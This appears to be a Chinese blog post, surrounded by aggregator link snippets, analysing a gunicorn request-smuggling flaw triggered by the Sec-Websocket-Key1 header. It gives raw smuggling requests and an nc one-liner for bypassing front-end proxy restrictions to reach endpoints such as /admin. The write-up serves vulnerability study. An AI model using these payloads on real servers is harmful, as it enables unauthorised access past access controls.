_HWHXY
_HWHXY

gunicorn走私漏洞

gunicorn走私漏洞

  • 源码:https://github.com/benoitc/gunicorn
  • 漏洞定位:https://github.com/benoitc/gunicorn/blob/20.x/gunicorn/http/message.py#142

漏洞分析

gunicorn走私漏洞_第1张图片
只要header里面存在Sec-Websocket-Key1
那么就将content_length强制赋值为8
比较简单直接构造POC

POC

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxGET /other HTTP/1.1
Host: example.com

gunicorn会认为上述请求是两个请求


GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxx


GET /other HTTP/1.1
Host: example.com

但其他的代理服务器则会认为是一个请求,因为没有Sec-Websocket-Key1的逻辑

那么借此就可以绕过gunicorn之外的一些服务器的限制

利用

gunicorn走私漏洞_第2张图片

例如前端haproxy拒绝访问POST请求,但是gunicorn可以访问
则可以利用上述POC构造

GET / HTTP/1.1
Host: example.com
Content-Length: 48
Sec-Websocket-Key1: x

xxxxxxxxPOST /other HTTP/1.1
Host: example.com

关于Content-Length如何构造

gunicorn走私漏洞_第3张图片
burp开启自动更新则可以计算body的大小
关闭则可以自己repeat poc

或者使用命令行nc

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 68\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /admin HTTP/1.1\r\nHost: localhost\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 9999

这里需要自己计算不同的content-length在不同的proxy中的请求体内容。

你可能感兴趣的:(云安全,gunicorn)

  • 理解Gunicorn:Python WSGI服务器的基石 范范0825 ipythonlinux运维
    理解Gunicorn:PythonWSGI服务器的基石介绍Gunicorn,全称GreenUnicorn,是一个为PythonWSGI(WebServerGatewayInterface)应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具,Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置,帮助初学者快速上手。1.什么是Gunico
  • 关于django中几个重要的gunicorn worker的配置 给我起把狙 djangogunicorn
    关于django中几个重要的gunicornworker的配置一、worker_classworker_class是Gunicorn的配置参数之一,它指定了工作进程(worker)的类型。不同的worker_class提供了不同的并发模型,适合不同类型的应用场景。sync和gevent是两种常见的worker_class,它们的作用和区别如下:1.sync(同步worker)默认值:如果没有指定w
  • gunicorn未重启,导致代码没拉到最新问题。 给我起把狙 gunicornlinux运维
    问题描述:我的测试环境的django项目是用gunicorn启动的,然后我本地使用pythonmanagy.py启动的,新写了个接口,在本地测试没问题,在测试环境报404。我发现发了最新代码到远端,然后我在测试环境pull下来的时候出问题了,代码不是最新的,后来我的经理告诉我说要重启gunicorn的主进程给了我一条指令"kill-HUPgunicorn_pid(最小的)”,针对这个问题我大致做了
  • 阿里云产品2023年特卖,数十款云产品1元起 阿里云最新优惠和活动汇总
    阿里云推出2023年云产品特卖活动,此活动汇聚阿里云热门云产品,1元起体验阿里云安全、稳定、领先的云服务!账号完成实名认证还送满减优惠券,助您低成本轻松上云!下面是活动详细内容。活动中心图.png活动直达:1、点此进入阿里云2023年云上特卖活动2、点此进入阿里云官网领券平台一、云服务器产品特卖面向个人/企业新用户的新购优惠(以下优惠只可享受1台1次,不可叠加享受):1.购买轻量应用服务器指定配置
  • 如何利用人工智能增强API和微服务的云安全 极道亦有道 人工智能微服务架构
    概述API是一组指导方针和协议,用于促进软件应用程序之间的通信。它概述了软件组件交互的方法,简化了开发和集成系统的过程。微服务架构代表了一种将大型应用程序划分为多个服务的软件开发方法。每个服务集中于一个业务功能。它们可以自主开发、部署和扩展。云安全对API和微服务非常重要,其原因如下:(1)数据保护:API和微服务经常处理信息。维护安全性对于保护这些数据免受访问、泄漏或破坏至关重要。(2)用户身份
  • 在Docker容器中部署Flask应用:一步步的实践指南 2401_85743969 算法dnn学习
    引言Docker是一种流行的容器化技术,它允许开发者将应用及其依赖打包到一个轻量级、可移植的容器中。Flask是一个用Python编写的轻量级Web应用框架。Gunicorn是一个PythonWSGIHTTP服务器,用于生产环境。本文将详细介绍如何在Docker容器中运行Flask应用,包括使用Gunicorn作为服务器。Docker容器化的优势环境一致性:确保应用在不同环境中的一致性。开发与生产
  • 阿里云Could not connect to SITP host: smtp.163.com,port: 25; abments bug实用小工具阿里云github云计算
    问题描述系统发送邮件,采用的是网易邮箱,本地环境没问题,部署到阿里云,控制台报504,查看日志,系统连接网易邮箱服务器超时;原因分析原因:阿里云服务器封禁了25端口,即使安全组放开,无济于事;解决方法解决方法:开启SSL使用465端口进行发送(放开阿里云安全组465端口);实现:避免采坑,使用hutool提供的MailUtil工具类进行邮件发送;```xmlcn.hutoolhutool-all5
  • 系统上公有云安全需要考虑什么? VinK1 云安全云计算腾讯云网络安全安全架构
    系统上公有云安全需要考虑什么?前言一.为什么要上云?二.公有云和传统IDC的IT模式差异在哪里?三.基于差异,开展安全工作的变化在哪?四.基于上述的变化,上云怎么做安全?4.1先想明白是否必要上,计划上什么云厂商?4.2梳理需求4.3整理安全架构4.4设计权限矩阵五.后续前言最近在项目合作中涉及到部分业务需要上公有云,但翻了一些公开材料没有发现很好的介绍业务上公有云安全应该怎么做,故整理一篇材料分
  • 如何通过流量清洗来防御DDoS功击? 小蚁网络安全(胡歌) 网络运维服务器安全游戏
    DDoS功击是互联网企业面临的最复杂的网络安全威胁之一。功击者通过大量僵尸网络模拟真实用户对服务器发起访问,企业必须确定这些流量哪些是合法流量哪些是恶意功击流量。在去年2月份,知名的代码管理平台GitHub遭受1.3Tbps的传入流量功击,并受到每秒1.269亿的数据包轰炸。最终通过小蚁云安全对恶意流量进行清洗成功防御此次DDoS功击。GitHub并不是唯一的DDoS功击受害者,现在DDoS功击的
  • 守护云安全:数据保护与合规的最佳实践 网安加社区 安全网络云安全云原生数据安全
    随着云技术的蓬勃发展,企业对云服务日益依赖,保障用于存储与管理海量数据的云端平台的安全性也变得极其重要。如何保障云安全的背后也隐藏着一个不容忽视的要点:数据安全责任需由云服务提供商与客户共同承担。这种责任共担模型规定,云服务提供商负责保护其服务基础设施的安全,企业负责保护其在云环境中的数据和应用程序的安全。但当涉及基础设施即服务(IaaS)与平台即服务(PaaS)等多种服务模式时,执行这种责任共担
  • Gunicorn多进程指南:让Web应用跑得更快 范范0825 gunicorn前端
    Gunicorn多进程指南:让Web应用跑得更快目录简介什么是Gunicorn为什么选择Gunicorn基础知识WSGI协议并发模型概述安装与配置安装Gunicorn基本配置工作进程模式同步工作进程异步工作进程Gevent和Eventlet工作进程性能优化配置优化监控和调试部署与集成与Nginx集成在Docker中使用生产环境中的最佳实践常见问题与解决方案性能问题错误处理总结1.简介什么是Guni
  • 基于 Gunicorn、Flask 和 Docker 的 Web 应用开发 勤劳兔码农 gunicornflaskdocker
    基于Gunicorn、Flask和Docker的Web应用开发教程欢迎语欢迎来到基于Gunicorn、Flask和Docker的Web应用开发教程,让我们开始构建你的微服务架构!第一部分:Docker和Flask简介1.1Docker基本概念Docker是一个开源的应用容器引擎,它允许开发者打包他们的应用以及应用的运行环境到一个可移植的容器中。容器可以运行在任何支持Docker的机器上,确保了环境
  • 基于gunicorn+flask+docker模型高并发部署 Dingdangr gunicorn
    基于Gunicorn+Flask+Docker模型的高并发部署是一种现代且高效的微服务架构部署方式,它结合了Flask作为Web框架的简洁性、Gunicorn作为WSGIHTTP服务器的性能优势,以及Docker容器化技术的一致性和可移植性。以下将详细阐述该模型的高并发部署过程:一、环境准备安装Python:确保系统中已安装Python,这是Flask和Gunicorn运行的基础环境。安装Flas
  • python sanic教程_基于python3.5+的web框架sanic中文入门教程 weixin_39771614 pythonsanic教程
    简介sanic是一款用python3.5+写的webframework,用法和flask类似,sanic的特点是非常快github官网:https://github.com/channelcat…速度比较框架实现基础每秒请求数平均时间SanicPython3.5+uvloop30,6013.23msWheezygunicorn+meinheld20,2444.94msFalcongunicorn+
  • Azure与Google Cloud Platform(GCP)的云安全策略与最佳实践(第二篇) Hi, how are you azuremicrosoftweb安全安全网络云计算
    1.引言随着企业业务不断向云端迁移,理解和实施Azure与GoogleCloudPlatform(GCP)的安全最佳实践变得愈发重要。本篇文章将探讨这两个主流云平台的安全策略,结合代码示例,帮助用户更好地保护其云计算环境。2.Azure云安全架构2.1.Azure的共享责任模型与AWS类似,Azure也采用共享责任模型。Azure负责物理层和基础设施的安全,而用户负责虚拟机、应用、数据及其权限的管
  • 常见的服务器技术和服务器技术的重要性 德迅云安全-甲锵 服务器服务器运维
    服务器技术是指一系列用于构建、维护和管理服务器的技术和工具,旨在确保服务器能够高效、稳定、安全地运行,以满足客户端的请求并提供各种服务。它涵盖了服务器硬件、操作系统、网络协议、数据存储和安全等多个方面的知识和技能。今天,德迅云安全就带您来了解下相关方面的知识。一、常见的服务器技术包括以下几种:1.虚拟化技术:虚拟化技术允许在一台物理服务器上创建多个虚拟服务器,每个虚拟服务器都可以独立运行不同的操作
  • DDoS和CC攻击的原理 a'ゞ云防护游戏盾 ddos网络安全服务器阿里云经验分享
    目前最常见的网络攻击方式就是CC攻击和DDoS攻击这两种,很多互联网企业服务器遭到攻击后接入我们德迅云安全高防时会问到,什么是CC攻击,什么又是DDoS攻击,这两个有什么区别的,其实清楚它们的攻击原理,也就知道它们的区别了。DDoS攻击DDoS攻击(分布式拒绝服务攻击)指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力DD
  • 政务云安全风险分析与解决思路探讨 德迅云安全--陈琦琦 网络安全web安全
    1.1概述为了掌握某市政务网站的网络安全整体情况,在相关监管机构授权后,我们组织人员抽取了某市78个政务网站进行安全扫描,通过安全扫描,对该市政务网站的整体安全情况进行预估。1.2工具扫描结果本次利用漏洞扫描服务VSS共扫描各类政务网站78个,其中存在漏洞的网站38个,占比为48.7%。其中存在高危漏洞的网站6个,占扫描网站总数的7.6%.从检测出漏洞的危险等级来看,高危漏洞数量占13%,中危占2
  • Flask+Gunicorn中文乱码解决方案 酒酿小圆子~ Pythonflaskgunicornpython
    在使用Flask+Gunicorn部署应用时,发现中文的输出存在乱码的现象。这是因为Python的默认编码是ASCII,而ASCII并不支持中文字符。解决Python中文乱码问题的首要任务是确保使用合适的编码方式。当你处理中文字符时,应该使用UTF-8编码。UTF-8是一种支持多种字符集的编码方式,包括中文字符。一、关于编码的背景知识首先我们来谈一谈编码这个东西,由于计算机是美国人发明的,最早的编
  • gunicorn + Flask多进程 print 打印日志乱序问题处理 程序员荒生 python开源学习pythonflask
    问题描述gunicorn+Flask部署Python服务,worker>2时发现print打印日志至stdout乱序问题分析多进程部署环境print打印不安全,需要添加全局进程锁问题处理Python中最常见多进程锁(multiprocessing.Lock)和多线程锁(threading.Lock),多进程锁实现锁定子进程资源功能,多线程实现锁定子线程资源功能。gunicorn+Flask架构,g
  • 企业出海如何做好安全防护? 九河云 安全
    随着出海的企业越来越多,企业在海外业务的安全问题越来越多,从而影响客户业务的正常运行,对于客户的经济损失也更大,所以客户急需在业务安全的防护。我们九河一直致力于企业出海,对于出海深厚技术积累,对此我们为客户的业务需求推荐使用,腾讯云的云安全中心服务。云安全中心(CloudSecurityCenter,CSC)是腾讯云一站式安全管理平台,通过资产中心、风险中心、告警中心、高级安全管理,帮助用户实现事
  • 德迅云安全教您如何辨别高性能服务器 德迅云安全-甲锵 服务器服务器运维
    IDC行业的快速发展让IDC服务商日益增多,服务器市场时常出现鱼龙混杂的情况。一台高性能服务器对于网站运营来说是可起到很好的帮助,可服务器对种多样,怎样才能找到服务器性能好的呢?下面跟德迅云安全一起来判断一下。怎么辨别高性能服务器:一、硬盘类型(如SATA,SSD)服务器中的固态硬盘(SSD)比SATA硬盘驱动器提供更高的磁盘读/写速度,也称为输入/输出(I/O)性能。具有SSD读取和写入磁盘的服
  • DNS服务器异常有什么影响,怎么处理 德迅云安全-甲锵 服务器服务器网络运维
    DNS服务器是指能够将域名转换为IP地址的服务器,我们在访问互联网上的网站、应用程序或服务时,通常都需要借助DNS服务器才能正确地完成访问。然而,在实际使用过程中,我们有时会遇到DNS服务器异常的情况,如无法解析域名、访问网站缓慢等问题,这些问题都可能影响到我们的网络体验。本文德迅云安全带您来分析了解下DNS异常原因和处理方法。一、DNS服务器异常的原因1.DNS服务器本身故障DNS服务器是一种软
  • 搭建web服务器应该注意哪些方面 德迅云安全-甲锵 服务器网站前端服务器运维
    在当今天数字化时代,Web服务器是许多人和企业所需要的重要组成部分。构建自己的Web服务器不仅仅可以提供更大的自由度和灵活性,还可以降低低成本并满足特定需求。德迅云安全将为您详细介绍如何从头开始搭构建一个Web服务器,含盖硬件选择、操作系统安装、Web服务器软件配置和安全性优化等方面。搭建web服务器应该注意哪些方面第一部分:硬件选择与准备选择适合当的硬件:根据预期的网站访问量和资源需求,选择一台
  • 开源模型应用落地-qwen-7b-chat与vllm实现推理加速的正确姿势(二) charles_vaez 开源大语言模型-实际应用落地开源交互
    一、术语介绍1.1.Gunicorn一个用于运行PythonWeb应用程序的HTTP服务器。它是一个基于UNIX的预叉(pre-fork)服务器,专为在高并发环境中运行PythonWeb应用程序而设计。1.2.Flask一个轻量级的PythonWeb框架,用于构建Web应用程序。它被设计成简单易用且灵活的框架,提供了基本的功能和工具,同时保持了扩展性和可定制性。1.3.Supervisor一个用于
  • 什么是SQL注入,有什么防范措施 安全http
    随着互联网的普及和数字化进程的加速,Web攻击已经成为网络安全领域的一大威胁。Web攻击不仅可能导致个人隐私泄露、财产损失,还可能对企业和国家的安全造成严重影响。下面德迅云安全就分享一种常见的web攻击方式-SQL注入,了解下什么是SQL注入,还有面对攻击时有哪些防范措施。通过了解这方面的网络安全知识,可以提高日常的web安全性。什么是SQL注入:SQL注入(SQLInjection)是一种常见的
  • Gunicorn源码分析(四)入口 喵帕斯0_0
    前面的博客已经将Gunicorn的核心流程给讲完了,剩下的最后其实就是Gunicorn的启动入口了下面是Gunicorn入口函数:defrun():"""\The``gunicorn``commandlinerunnerforlaunchingGunicornwithgenericWSGIapplications."""fromgunicorn.app.wsgiappimportWSGIAppli
  • 企业云安全挑战 田鑫科技
    为了扩展业务范围,所有者正在转向基于云的环境,在这些环境中,他们可以根据相关要求灵活地选择云容量。此外,云计算还允许您随时随地访问系统文件并对其进行调整。简而言之,云更便宜,更高效,市场准备就绪。但是,安全性长期以来一直是基于云计算的关注点,这就是为什么一些公司仍拒绝将其应用程序迁移到云中的原因。下面概述了一些主要的此类挑战,以帮助您了解此事。解决DDoS攻击任何收集更多数据的企业都容易受到恶意攻
  • 2024年不容忽视的六大多云安全威胁 诗者才子酒中仙 云计算/大数据/安全/数据库安全
    随着我们进入新的一年,了解可能影响多云环境的威胁只是第一步。下一步是制定更灵活、更全面的安全战略。随着攻击者变得越来越具创新精神,企业也需要加快步伐,做同样的事情。随着人工智能和量子计算的发展,我们需要为云可能发生的变化和相应的适应做好准备。考虑到云基础设施的可靠性、灵活性和成本优势,在过去的几年里,一些企业已经陆续转向了多云环境。不幸的是,这种转变带来了一系列新的安全威胁。如果您所在企业正在多云
  • Google Cloud 2024 年报告重点介绍了关键的网络威胁和防御 网络研究院 网络研究院网络安全系统威胁报告
    GoogleCloud的2024年威胁范围报告预测了云安全的主要风险,并提出了加强防御的策略。该报告由Google安全专家撰写,为寻求预测和应对不断变化的网络安全威胁的云客户提供了宝贵的资源。该报告强调,凭证滥用、加密货币挖矿、勒索软件和数据盗窃的普遍存在是未来一年最重要的云安全问题。攻击者越来越多地将目标瞄准云基础设施,利用弱密码和错误配置来获得未经授权的访问。对于威胁行为者来说,加密货币挖矿仍
  • ASM系列五 利用TreeApi 解析生成Class lijingyao8206 ASM字节码动态生成ClassNodeTreeAPI
       前面CoreApi的介绍部分基本涵盖了ASMCore包下面的主要API及功能,其中还有一部分关于MetaData的解析和生成就不再赘述。这篇开始介绍ASM另一部分主要的Api。TreeApi。这一部分源码是关联的asm-tree-5.0.4的版本。          在介绍前,先要知道一点, Tree工程的接口基本可以完
  • 链表树——复合数据结构应用实例 bardo 数据结构树型结构表结构设计链表菜单排序
    我们清楚:数据库设计中,表结构设计的好坏,直接影响程序的复杂度。所以,本文就无限级分类(目录)树与链表的复合在表设计中的应用进行探讨。当然,什么是树,什么是链表,这里不作介绍。有兴趣可以去看相关的教材。 需求简介: 经常遇到这样的需求,我们希望能将保存在数据库中的树结构能够按确定的顺序读出来。比如,多级菜单、组织结构、商品分类。更具体的,我们希望某个二级菜单在这一级别中就是第一个。虽然它是最后
  • 为啥要用位运算代替取模呢 chenchao051 位运算哈希汇编
        在hash中查找key的时候,经常会发现用&取代%,先看两段代码吧,     JDK6中的HashMap中的indexFor方法: /** * Returns index for hash code h. */ static int indexFor(int h, int length) {
  • 最近的情况 麦田的设计者 生活感悟计划软考
          今天是2015年4月27号      整理一下最近的思绪以及要完成的任务             1、最近在驾校科目二练车,每周四天,练三周。其实做什么都要用心,追求合理的途径解决。为
  • PHP去掉字符串中最后一个字符的方法 IT独行者 PHP字符串
    今天在PHP项目开发中遇到一个需求,去掉字符串中的最后一个字符 原字符串1,2,3,4,5,6, 去掉最后一个字符",",最终结果为1,2,3,4,5,6 代码如下: $str = "1,2,3,4,5,6,"; $newstr = substr($str,0,strlen($str)-1); echo $newstr;
  • hadoop在linux上单机安装过程 _wy_ linuxhadoop
    1、安装JDK     jdk版本最好是1.6以上,可以使用执行命令java -version查看当前JAVA版本号,如果报命令不存在或版本比较低,则需要安装一个高版本的JDK,并在/etc/profile的文件末尾,根据本机JDK实际的安装位置加上以下几行:    export JAVA_HOME=/usr/java/jdk1.7.0_25  
  • JAVA进阶----分布式事务的一种简单处理方法 无量 多系统交互分布式事务
    每个方法都是原子操作: 提供第三方服务的系统,要同时提供执行方法和对应的回滚方法 A系统调用B,C,D系统完成分布式事务 =========执行开始======== A.aa(); try { B.bb(); } catch(Exception e) { A.rollbackAa(); } try { C.cc(); } catch(Excep
  • 安墨移动广 告:移动DSP厚积薄发 引领未来广 告业发展命脉 矮蛋蛋 hadoop互联网
      “谁掌握了强大的DSP技术,谁将引领未来的广 告行业发展命脉。”2014年,移动广 告行业的热点非移动DSP莫属。各个圈子都在纷纷谈论,认为移动DSP是行业突破点,一时间许多移动广 告联盟风起云涌,竞相推出专属移动DSP产品。   到底什么是移动DSP呢?   DSP(Demand-SidePlatform),就是需求方平台,为解决广 告主投放的各种需求,真正实现人群定位的精准广
  • myelipse设置 alafqq IP
      在一个项目的完整的生命周期中,其维护费用,往往是其开发费用的数倍。因此项目的可维护性、可复用性是衡量一个项目好坏的关键。而注释则是可维护性中必不可少的一环。 注释模板导入步骤  安装方法: 打开eclipse/myeclipse 选择 window-->Preferences-->JAVA-->Code-->Code
  • java数组 百合不是茶 java数组
    java数组的   声明  创建  初始化;   java支持C语言      数组中的每个数都有唯一的一个下标 一维数组的定义 声明: int[] a = new int[3];声明数组中有三个数int[3] int[] a 中有三个数,下标从0开始,可以同过for来遍历数组中的数
  • javascript读取表单数据 bijian1013 JavaScript
    利用javascript读取表单数据,可以利用以下三种方法获取: 1、通过表单ID属性:var a = document.getElementByIdx_x_x("id"); 2、通过表单名称属性:var b = document.getElementsByName("name"); 3、直接通过表单名字获取:var c = form.content.
  • 探索JUnit4扩展:使用Theory bijian1013 javaJUnitTheory
    理论机制(Theory) 一.为什么要引用理论机制(Theory)         当今软件开发中,测试驱动开发(TDD — Test-driven development)越发流行。为什么 TDD 会如此流行呢?因为它确实拥有很多优点,它允许开发人员通过简单的例子来指定和表明他们代码的行为意图。 TDD 的优点:     &nb
  • [Spring Data Mongo一]Spring Mongo Template操作MongoDB bit1129 template
    什么是Spring Data Mongo Spring Data MongoDB项目对访问MongoDB的Java客户端API进行了封装,这种封装类似于Spring封装Hibernate和JDBC而提供的HibernateTemplate和JDBCTemplate,主要能力包括 1. 封装客户端跟MongoDB的链接管理 2. 文档-对象映射,通过注解:@Document(collectio
  • 【Kafka八】Zookeeper上关于Kafka的配置信息 bit1129 zookeeper
    问题: 1. Kafka的哪些信息记录在Zookeeper中 2. Consumer Group消费的每个Partition的Offset信息存放在什么位置 3. Topic的每个Partition存放在哪个Broker上的信息存放在哪里 4. Producer跟Zookeeper究竟有没有关系?没有关系!!!   //consumers、config、brokers、cont
  • java OOM内存异常的四种类型及异常与解决方案 ronin47 java OOM 内存异常
           OOM异常的四种类型:       一: StackOverflowError :通常因为递归函数引起(死递归,递归太深)。-Xss 128k 一般够用。        二: out Of memory: PermGen Space:通常是动态类大多,比如web 服务器自动更新部署时引起。-Xmx
  • java-实现链表反转-递归和非递归实现 bylijinnan java
    20120422更新: 对链表中部分节点进行反转操作,这些节点相隔k个: 0->1->2->3->4->5->6->7->8->9 k=2 8->1->6->3->4->5->2->7->0->9 注意1 3 5 7 9 位置是不变的。 解法: 将链表拆成两部分: a.0-&
  • Netty源码学习-DelimiterBasedFrameDecoder bylijinnan javanetty
    看DelimiterBasedFrameDecoder的API,有举例: 接收到的ChannelBuffer如下: +--------------+ | ABC\nDEF\r\n | +--------------+ 经过DelimiterBasedFrameDecoder(Delimiters.lineDelimiter())之后,得到: +-----+----
  • linux的一些命令 -查看cc攻击-网口ip统计等 hotsunshine linux
    Linux判断CC攻击命令详解 2011年12月23日 ⁄ 安全 ⁄ 暂无评论 查看所有80端口的连接数 netstat -nat|grep -i '80'|wc -l 对连接的IP按连接数量进行排序 netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n 查看TCP连接状态 n
  • Spring获取SessionFactory ctrain sessionFactory
    String sql = "select sysdate from dual"; WebApplicationContext wac = ContextLoader.getCurrentWebApplicationContext(); String[] names = wac.getBeanDefinitionNames(); for(int i=0; i&
  • Hive几种导出数据方式 daizj hive数据导出
    Hive几种导出数据方式   1.拷贝文件   如果数据文件恰好是用户需要的格式,那么只需要拷贝文件或文件夹就可以。 hadoop fs –cp source_path target_path   2.导出到本地文件系统   --不能使用insert into local directory来导出数据,会报错 --只能使用
  • 编程之美 dcj3sjt126com 编程PHP重构
    我个人的 PHP 编程经验中,递归调用常常与静态变量使用。静态变量的含义可以参考 PHP 手册。希望下面的代码,会更有利于对递归以及静态变量的理解   header("Content-type: text/plain"); function static_function () { static $i = 0; if ($i++ < 1
  • Android保存用户名和密码 dcj3sjt126com android
    转自:http://www.2cto.com/kf/201401/272336.html 我们不管在开发一个项目或者使用别人的项目,都有用户登录功能,为了让用户的体验效果更好,我们通常会做一个功能,叫做保存用户,这样做的目地就是为了让用户下一次再使用该程序不会重新输入用户名和密码,这里我使用3种方式来存储用户名和密码 1、通过普通 的txt文本存储 2、通过properties属性文件进行存
  • Oracle 复习笔记之同义词 eksliang Oracle 同义词Oracle synonym
    转载请出自出处:http://eksliang.iteye.com/blog/2098861 1.什么是同义词       同义词是现有模式对象的一个别名。       概念性的东西,什么是模式呢?创建一个用户,就相应的创建了 一个模式。模式是指数据库对象,是对用户所创建的数据对象的总称。模式对象包括表、视图、索引、同义词、序列、过
  • Ajax案例 gongmeitao Ajaxjsp
    数据库采用Sql Server2005 项目名称为:Ajax_Demo 1.com.demo.conn包 package com.demo.conn; import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException; //获取数据库连接的类public class DBConnec
  • ASP.NET中Request.RawUrl、Request.Url的区别 hvt .netWebC#asp.nethovertree
      如果访问的地址是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree%3C&n=myslider#zonemenu那么Request.Url.ToString() 的值是:http://h.keleyi.com/guestbook/addmessage.aspx?key=hovertree<&
  • SVG 教程 (七)SVG 实例,SVG 参考手册 天梯梦 svg
    SVG 实例 在线实例 下面的例子是把SVG代码直接嵌入到HTML代码中。 谷歌Chrome,火狐,Internet Explorer9,和Safari都支持。 注意:下面的例子将不会在Opera运行,即使Opera支持SVG - 它也不支持SVG在HTML代码中直接使用。   SVG 实例 SVG基本形状 一个圆 矩形 不透明矩形 一个矩形不透明2 一个带圆角矩
  • 事务管理 luyulong javaspring编程事务
    事物管理 spring事物的好处 为不同的事物API提供了一致的编程模型 支持声明式事务管理 提供比大多数事务API更简单更易于使用的编程式事务管理API 整合spring的各种数据访问抽象 TransactionDefinition 定义了事务策略 int getIsolationLevel()得到当前事务的隔离级别 READ_COMMITTED 
  • 基础数据结构和算法十一:Red-black binary search tree sunwinner AlgorithmRed-black
      The insertion algorithm for 2-3 trees just described is not difficult to understand; now, we will see that it is also not difficult to implement. We will consider a simple representation known
  • centos同步时间 stunizhengjia linux集群同步时间
    做了集群,时间的同步就显得非常必要了。 以下是查到的如何做时间同步。 在CentOS 5不再区分客户端和服务器,只要配置了NTP,它就会提供NTP服务。 1)确认已经ntp程序包: # yum install ntp 2)配置时间源(默认就行,不需要修改) # vi /etc/ntp.conf server pool.ntp.o
  • ITeye 9月技术图书有奖试读获奖名单公布 ITeye管理员 ITeye
    ITeye携手博文视点举办的9月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 9月试读活动回顾:http://webmaster.iteye.com/blog/2118112本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀):      《NFC:Arduino、Andro
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他